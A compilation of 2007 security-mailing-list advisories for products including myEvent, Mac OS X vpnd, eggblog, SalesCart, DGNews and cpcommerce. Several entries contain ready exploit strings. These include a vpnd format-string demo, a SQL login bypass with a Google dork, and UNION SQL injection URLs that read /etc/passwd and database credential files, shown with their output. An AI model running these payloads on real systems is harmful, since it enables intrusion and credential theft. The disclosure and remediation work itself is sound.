myEvent version 1.6 Multiple Path Disclosure Vulnerabilities

[securityresearch]

netVigilance Security Advisory #24

myEvent version 1.6 Multiple Path Disclosure Vulnerabilities 

Description:
myEvent is Dynamic Calendar based Events Management system with admin panel for 
adding events, edit and delete built using PHP  mySQL. Display today's event 
and future events links on the calendar, Event will be displayed in 3 mode eg : 
pop-up, new windows and on same screen once link is clicked. There is also a 
mouse-over tool tip to display the events Template based and Simple easily 
intergrated to any websites.
External References: 
Mitre CVE:  CVE-2007-0690
NVD NIST: CVE-2007-0690
OSVDB: 34272

Summary: 
myEvent is Dynamic Calendar based Events Management system with admin panel for 
adding events, edit and delete built using PHP and mySQL.

Multiple pass disclosure vulnerabilities in the product allow attackers to 
gather the true path of the server-side script.


Advisory URL: 
http://www.netvigilance.com/advisory0024 

Release Date:
05/28/2007 

Severity:
Risk: Low
 
CVSS Metrics
Access Vector: Remote
Access Complexity: Low
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 2.3
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
 
Vulnerability Impact: Attack
Host Impact: Path disclosure.
SecureScout Testcase ID:
TC 17954

Vulnerable Systems:
myEvent version 1.6

Vulnerability Type:
Program flaw - The myevent.php and login.php scripts has flaws which lead to 
Warnings or even Fatal Error.

Vendor:
myWebland
Vendor Status: 
The Vendor has been notified several times on many different email addresses 
last on 15 May 2007. The Vendor has not responded. There is no official fix at 
the release of this Security Advisory.

Workaround:
Disable warning messages: modify in the php.ini file following line: 
display_errors = Off. Or modify .htaccess file (this will work only for the 
apache servers). 
Example: 
Path Disclosure Vulnerability 1:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/myevent.php?monthno[]=2year=2007
REPLY:
bWarning/b:  htmlspecialchars() expects parameter 1 to be string, array 
given in b[DISCLOSED PATH]\[PRODUCT-DIRECTORY]\initialize.php/b on line 
b71/bbr /
Path Disclosure Vulnerability 2:
REQUEST
http://[TARGET]/[PRODUCT-DIRECTORY]/ myevent.php?view[]=1
REPLY:
bWarning/b:  htmlspecialchars() expects parameter 1 to be string, array 
given in b[DISCLOSED PATH]\[PRODUCT-DIRECTORY]initialize.php/b on line 
b83/bbr /
Path Disclosure Vulnerability 3:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/login.php
Enter Login but do not enter password. Click Log In
REPLY:
bFatal error/b:  Call to undefined function:  notice() in b[DISCLOSED 
PATH]\[PRODUCT-DIRECTORY]\login.php/b on line b29/bbr /
Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com

Mac OS X vpnd local format string

[NGSSoftware Insight Security Research]

===
Summary
===
Name: Mac OS X vpnd local format string
Release Date: 29 May 2007
Reference: NGS00496
Discover: Chris Anley [EMAIL PROTECTED]
Vendor: Apple
Vendor Reference: 26417237
CVE-ID: CVE-2007-0753
Systems Affected: OS X Server 10.4.9 and prior
Risk: High
Status: Published


TimeLine

Discovered: 15 March 2007
Reported: 19 March 2007
Fixed: 24 May 2007
Published: 29 May 2007

===
Description
===
The 'vpnd' command shipped with OS X runs setuid root, and is vulnerable
to a format string attack.

=
Technical Details
=
The vpnd command, when run with the '-i' parameter, is vulnerable to a
format string attack. The command is setuid root, and is world-executable.

This allows any local user to execute arbitrary code as root, though the
vulnerable code is only accessible by default on server versions of OS
X. It is possible for a client version of OS X to be configured in a
vulnerable manner, though this requires extensive configuration changes
and is unlikely to happen by accident.

Demonstration:

Apple:~ shellcoders$ sw_vers
ProductName:Mac OS X Server
ProductVersion: 10.4.9
BuildVersion:   8P135
Apple:~ shellcoders$ vpnd -n -i _ABCD_%268\$x
2007-03-15 17:07:07 GMT Server '_ABCD_%268$x' starting...
2007-03-15 17:07:07 GMT Server ID '_ABCD_41424344' invalid
2007-03-15 17:07:07 GMT Error processing prefs file


(gdb) bt
#0  0x90011cb8 in __vfprintf ()
#1  0x9002a90c in vsnprintf ()
#2  0x9002a41c in vsyslog ()
#3  0x3150 in vpnlog ()
#4  0x4b80 in process_prefs ()
#5  0x28d4 in main ()

The source code for vpnd is available from the Apple Darwin source code
download site. The relevant code is in the ppp package. The code is
distributed under the Apple Public Source License, available at
http://www.opensource.apple.com/apsl/

The bug occurs in the process_prefs() function in vpnoptions.c.

The user-specified server name is passed into the snprintf() function as
data, and the resulting string is then passed to the vpnlog() function,
as the format_str parameter. Although the server name is limited to 64
characters (with '%.64s') it is still straightforward to exploit the
bug, and NGS have written a reliable exploit.

===
Fix Information
===
This issue was fixed by Apple in Security Update 2007-005, released on
the 24th May 2007. NGS would like to thank the Apple Security Team for
their professional and prompt response to this issue.


NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402

[MajorSecurity Advisory #48]eggblog - Session fixation Issue

[admin]

[MajorSecurity Advisory #48]eggblog - Session fixation Issue

Details
===
Product: eggblog 
Affected version: 3.1.0 and prior
Remote-Exploit: yes
Vendor-URL: http://www.eggblog.net
Vendor-Status: informed
Advisory-Status: published

Credits

Discovered by: David Vieira-Kurz
http://www.majorsecurity.de

Original Advisory:

http://www.majorsecurity.de/index_2.php?major_rls=major_rls48

Introduction

eggblog is a free php  mysql package, 
 allowing you to create your own online website, journal or weblog (blog). 
-from eggblog.net

More Details

1. Session fixation:
The PHPSESSID parameter can be set to a malicious and arbitrary value.

1.1 Description:
In a session fixation attack, the attacker fixes the user's session ID before 
the user even logs into the target server.
After a user's session ID has been fixed, the attacker will wait for them to 
login.
Once the user does so, the attacker uses the predefined session ID value to 
assume their online identity.

Workaround:

1. Do not accept session identifiers from GET / POST variables.

2.Regenerate SID on each request.

3. Accept only server generated SID:
One way to improve security is to not accept session identifiers not generated 
by server.

if ( ! isset( $_SESSION['SERVER_GENERATED_SID'] ) ) {
session_destroy(); // destroy all data in session
}
session_regenerate_id(); // generate a new session identifier
$_SESSION['SERVER_GENERATED_SID'] = true;


History/Timeline

25.05.2007 discovery of the vulnerability
27.05.2007 contacted the vendor
27.05.2007 working patch sent to the vendor
29.05.2007 advisory is written
29.05.2007 advisory released

MajorSecurity
===
MajorSecurity is a non-profit German penetration testing and security research 
project
which consists of only one person at the present time.
http://www.majorsecurity.de/

Re: Mac OS X vpnd local format string

[lists]

OSX client is also vulnerable and exploitable.

-KF

On May 29, 2007, at 7:26 AM, NGSSoftware Insight Security Research  
wrote:



===
Summary
===
Name: Mac OS X vpnd local format string
Release Date: 29 May 2007
Reference: NGS00496
Discover: Chris Anley [EMAIL PROTECTED]
Vendor: Apple
Vendor Reference: 26417237
CVE-ID: CVE-2007-0753
Systems Affected: OS X Server 10.4.9 and prior
Risk: High
Status: Published


TimeLine

Discovered: 15 March 2007
Reported: 19 March 2007
Fixed: 24 May 2007
Published: 29 May 2007

===
Description
===
The 'vpnd' command shipped with OS X runs setuid root, and is  
vulnerable

to a format string attack.

=
Technical Details
=
The vpnd command, when run with the '-i' parameter, is vulnerable to a
format string attack. The command is setuid root, and is world- 
executable.


This allows any local user to execute arbitrary code as root,  
though the

vulnerable code is only accessible by default on server versions of OS
X. It is possible for a client version of OS X to be configured in a
vulnerable manner, though this requires extensive configuration  
changes

and is unlikely to happen by accident.

Demonstration:

Apple:~ shellcoders$ sw_vers
ProductName:Mac OS X Server
ProductVersion: 10.4.9
BuildVersion:   8P135
Apple:~ shellcoders$ vpnd -n -i _ABCD_%268\$x
2007-03-15 17:07:07 GMT Server '_ABCD_%268$x' starting...
2007-03-15 17:07:07 GMT Server ID '_ABCD_41424344' invalid
2007-03-15 17:07:07 GMT Error processing prefs file


(gdb) bt
#0  0x90011cb8 in __vfprintf ()
#1  0x9002a90c in vsnprintf ()
#2  0x9002a41c in vsyslog ()
#3  0x3150 in vpnlog ()
#4  0x4b80 in process_prefs ()
#5  0x28d4 in main ()

The source code for vpnd is available from the Apple Darwin source  
code

download site. The relevant code is in the ppp package. The code is
distributed under the Apple Public Source License, available at
http://www.opensource.apple.com/apsl/

The bug occurs in the process_prefs() function in vpnoptions.c.

The user-specified server name is passed into the snprintf()  
function as
data, and the resulting string is then passed to the vpnlog()  
function,

as the format_str parameter. Although the server name is limited to 64
characters (with '%.64s') it is still straightforward to exploit the
bug, and NGS have written a reliable exploit.

===
Fix Information
===
This issue was fixed by Apple in Security Update 2007-005, released on
the 24th May 2007. NGS would like to thank the Apple Security Team for
their professional and prompt response to this issue.


NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other  
than
the intended recipient(s), any disclosure, copying, distribution,  
or any

other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS  
policy.

NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402

Apache httpd vulenrabilities

[Blazej Miga]

PSNC Security Team has got the pleasure to announce that, as a result of 
Apache httpd server (ver. 1.3.x, 2.0.x and 2.2.x) source code analysis, 
several vulnerabilities have been found that make it possible to perfom a 
DoS attack against the services and the system that the application is 
running on. Below the basic information on found vulnerabilities may be 
found:


Vuln#1
Httpd Server DoS
Test environment: ver. 2.0.59, 2.2.4, prefork mpm module

An appropriate code run in the worker process context makes it possible to 
kill all worker processes with simultaneous blocking of creating new 
worker processes by the master process. As a result, the server stops to 
accept and handle new connections.


Vuln #2
SIGUSR1 killer
Test environment: ver. 2.0.59, 2.2.4 prefork mpm module

An appropriate code run in the worker process context makes it possible to 
send SIGUSR1 signals by the master process (that runs with root 
credentials) to an arbitrary process within the system.


Vuln #3
SIGUSR1 killer
Test environment: ver 1.3.37

An appropriate code run in the worker process context makes it possible to 
send SIGUSR1 signals by the master process (that runs with root 
credentials) to an arbitrary process within the system.


Vuln #4
System DoS
Test environment: ver 2.0.59, 2.2.4 prefork mpm module

An appropriate code run in the worker process context makes it possible to 
force the master process to create an unlimited amount of new worker 
processes. As a result, the activity of the whole system may be blocked.



Countermeasures:

Disabling the possibility of running the user.s code in the worker process 
context. An especial emphasis should be put on programming languages that 
may be configures as an Apache module (like mod_php, mod_perl etc.) in 
order to block dangerous functions, e.g. dl(), dlopen().





The information on the vulnerabilities above was sent to Apache Software 
Foundation on 16 May, 2006. For over 1 year no official patch has been 
issued. PSNC Security Team is currently working on its own, unofficial 
patches. Our patches will be published on 18 June, 2007 on the team 
webpage (http://security.psnc.pl). On 20 June, 2007 the detailed 
information on the found vulnerabilities will be issued.



PSNC Security Team

RedLevel Advisory #23 - SalesCart Shopping Cart SQL Injection Vulnerability

[john]

SalesCart Shopping Cart - SQL Injection Vulnerability

SalesCart does not sanitize any forms in cgi-bin/reorder2.asp, allowing an 
attacker to inject arbitrary SQL queries, as well as possible command execution.

Google d0rk: Sorry, you have no Items in your Shopping Cart ! 
inurl:cgi-bin/view1.asp
Vulnerable Variable: All forms in reorder2.asp
Vulnerable File: cgi-bin/reorder2.asp (password: x' OR 'x'='x)
Vendor Status: Notified multiple times, no response. Possible silent patch.

John Martinelli
[EMAIL PROTECTED]

RedLevel Security
RedLevel.org

May 30th, 2007

[security bulletin] HPSBUX02087 SSRT4728 rev.5 - HP-UX running TCP/IP Remote Denial of Service (DoS)

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00579189
Version: 5

HPSBUX02087 SSRT4728 rev.5 - HP-UX running TCP/IP Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2005-12-09
Last Updated: 2007-05-21

Potential Security Impact: Remote Denial of Service (DoS) 

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running 
TCP/IP. 
The potential vulnerability could be exploited remotely to cause a Denial of 
Service (DoS). 

References: CVE-2004-0744

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.04, B.11.11, B.11.23 running TCP/IP. 

BACKGROUND

To determine if an HP-UX system has an affected version, 
search the output of swlist -a revision -l fileset 
for one of the filesets listed below. For affected systems 
verify that the recommended action has been taken. 

AFFECTED VERSIONS 

HP-UX B.11.00 
= 
- -Streams.STREAMS-KRN 
action: install PHNE_30161 or subsequent 

HP-UX B.11.04 
= 
Networking.NET-KRN 
action: install PHNE_33427 or subsequent and install sqmax (see Resolution 
section) 

HP-UX B.11.11 
= 
Streams.STREAMS-KRN 
action: install PHNE_34131 or subsequent 

HP-UX B.11.23 
= 
Streams.STREAMS2-KRN 
action: install PHKL_31500 or subsequent 

END AFFECTED VERSIONS 

RESOLUTION

HP has made patches and product updates available to resolve the issue. 
After installing the recommended patches for B.11.04 
a system parameter must be set. A utility, sqmax, must be 
downloaded and installed to set the required system parameter as 
discussed below. 

B.11.00 install PHNE_30161 or subsequent, sqmax not required
 
B.11.04 install PHNE_33427 or subsequent, then install sqmax as discussed below
 
B.11.11 install PHNE_34131 or subsequent, sqmax not required
 
B.11.23 install PHKL_31500 or subsequent, sqmax not required

The patches are available from http://itrc.hp.com 

For B.11.04: 
After the patches listed above are installed an internal system parameter 
must be set. A utility, sqmax, has been provided to set the parameter. 
The sqmax utility is available by writing to [EMAIL PROTECTED] 

MANUAL ACTIONS: Yes - NonUpdate 
B.11.04 - After installing patch, install sqmax. Run /usr/contrib/bin/sqmax 
1000 or reboot. 

PRODUCT SPECIFIC INFORMATION 

HP-UX Security Patch Check: Security Patch Check revision B.02.00 
analyzes all HP-issued Security Bulletins to provide a subset of 
recommended actions that potentially affect a specific HP-UX 
system. For more information: 
http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA
 

HISTORY 
Version:1 (rev.1) 14 December 2005 Initial release 
Version:2 (rev.2) 24 July 2006 New sqmax utility for B.11.04, augmented 
installation instructions 
Version:3 (rev.3) 31 July 2006 PHNE_34131 is available for B.11.11 
Version:4 (rev.4) 09 October 2006 PHNE_30161 is available for B.11.00 
Version:5 (rev.5) 21 May 2007 Corrected fileset information for PHNE_30161 

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP 

Re: DGNews version 2.1 SQL Injection Vulnerability

[laurent . gaffie]

hi there

there's also another sql injection on this script:
news.php?go=fullnewsnewsid=-9+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7%20from%20news_comment/*
//result: This news has 1 comments. Please read, or post one by click here.
* 5 (by: root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:...

read the database credentials plain text :
news.php?go=fullnewsnewsid=-9+union+select+1,2,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870),4,5,6,7%20from%20news_comment/*
//information is in the source code.
* 
0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870
 = /usr/local/apache2/htdocs/dgnews/admin/conf.php 

ps: works regardless of php.ini settings .

regards laurent gaffie

cpcommerce v1.1.0 [sql injection]

[laurent . gaffie]

vendor site:http://cpcommerce.cpradio.org/
product:cpcommerce  v1.1.0
bug: sql injection
risk : high
note:works regardless of php.ini settings .
 
http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0/**/from/**/cpAccounts/*
 
//result:
 Information about '8725ade7b722d1ad43b7b949162eab4d'
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh
...
http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,email,0/**/from/**/cpAccounts/*
//result:
 Information about '8725ade7b722d1ad43b7b949162eab4d'
[EMAIL PROTECTED]

read database credentials plain text:
http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870),pass,0/**/from/**/cpAccounts/*
//result:Products in '..
// Database Information 
$config['host'] = localhost; // Database Host $config['user'] = my_user; // 
Database Username $config['pass'] = my_password; // Database Password 
$config['database'] = hi; // Database Name $config['prefix'] = cp;
...
'8725ade7b722d1ad43b7b949162eab4d'

ps1: 
0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870
-- /usr/local/apache2/htdocs/cpcommerce/_config.php

ps2: /**/cpAccounts/* -- cp = prefix. 
Accounts -- table_name .
(cp is the default one) so you can try with your table prefix .

regards laurent gaffie

Full Path Disclosure in Almnzm

[xx_hack_xx_2004]

Hello
Vulnerable : Almnzm
Web : http://www.almnzm.com

Exploit :
http://example.com/almnzm/index.php?action=activateorderorderid=['Anything']



Discovered By Linux_Drox
www.LeZr.Com

Best Regards 

n.runs-SA-2007.011 - Avira Antivir Antivirus UPX parsing Divide by Zero Advisory

[security]

n.runs AG  
http://www.nruns.com/ security(at)nruns.com
n.runs-SA-2007.011   29-May-2007


Vendor:Avira GmbH, http://www.avira.com
Affected Product:  Avira Antivir Antivirus
Vulnerability: Divide by Zero Engine DoS (remote) 
Risk:  HIGH


Vendor communication:

  2007/05/07initial notification to Avira GmbH
  2007/05/07Avira GmbH Response
  2007/05/08PGP public keys exchange
  2007/05/09PoC files sent to Avira GmbH
  2007/05/10Avira GmbH acknowledged and validated the PoC files
  2007/05/16Avira GmbH sent fix release schedule and fixed
engine
  2007/05/17Sergio Alvarez tested fixed engine
  2007/05/23Avira GmbH released Update with fixes


Overview:
 
Avira, a company with over 15 millions customers and more than 250 employees
is a worldwide leading supplier of self-developed security solutions for
professional and private use. With more than 20 years of experience, the
company is one of the pioneers in this field.
In addition to programs specifically for use on single workstations, Avira
primarily offers professional solutions for cross-system protection of
networks on various levels. These include products for workstations, file,
mail and web servers. Gateway computers can be managed as workstation
computers via a central management console for all operating systems. In
addition to the management products of the individual solutions, security
programs for PDAs, smartphones and embedded devices are also offered.
Avira AntiVir Personal, used by millions of private users, represents a
significant contribution to security.

Description:

A remotely exploitable vulnerability has been found in the file parsing
engine.

In detail, the following flaw was determined:

- Divide by Zero in UPX packed files parsing


Impact:

This problem can lead to remote engine denial of service if an attacker
carefully crafts a file that exploits the aforementioned vulnerability. The
vulnerability is present in Avira Antivir Antivirus software versions prior
to the update Version 7.03.00.09. 

Solution: 
The vulnerability was reported on 07.May.2007 and an update has been issued
on 23.May.2007 to solve this vulnerability through the regular update
mechanism.


Credit: 
Bugs found by Sergio Alvarez of n.runs AG. 


References: 
http://forum.antivir-pe.de/thread.php?threadid=22528

This Advisory and Upcoming Advisories:
http://www.nruns.com/parsing-engines-advisories.php


Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
[EMAIL PROTECTED] for permission. Use of the advisory constitutes
acceptance for use in an as is condition. All warranties are excluded. In
no event shall n.runs be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages, even if n.runs has been advised of the possibility of such damages.


Copyright 2007 n.runs AG. All rights reserved. Terms of apply.